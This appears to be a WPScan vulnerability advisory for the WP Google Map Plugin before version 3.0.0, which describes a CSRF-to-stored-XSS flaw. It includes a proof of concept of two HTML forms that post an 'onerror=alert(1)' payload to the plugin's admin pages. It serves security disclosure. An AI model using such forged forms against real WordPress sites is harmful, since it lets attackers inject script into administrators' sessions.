WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Google Map Plugin < 3.0.0 - CSRF to Authenticated Cross-Site Scripting (XSS)

Description

The lack of CSRF Protection could allow attackers to perform XSS attack against logged in administrators.

Proof of Concept

<form method="POST" action="https://example.com/wp-admin/admin.php?page=wpgmp_add_location" />
<input type="text" name="googlemap_title" value='"><img src=x onerror=alert(1) /> ' />
<input type="submit" />
</form>

<form method="POST" action="https://example.com/wp-admin/admin.php?page=wpgmp_google_wpgmp_create_group_map" />
<input type="text" name="group_map_title" value='"><img src=x onerror=alert(1) /> ' />
<input type="submit" />
</form>

Affects Plugins

wp-google-map-plugin
Fixed in version 3.0.0

References

URL
http://cinu.pl/research/wp-plugins/mail_7f44ee1674f69bba54409d00ca562e8d.html
URL
http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter
ethicalhack3r
Verified

No

WPVDB ID
f2093e0a-8365-435a-b257-64684ad7ddb0

Timeline

Publicly Published

2015-08-20 (about 6 years ago)

Added

2015-11-23 (about 6 years ago)

Last Updated

2020-09-08 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin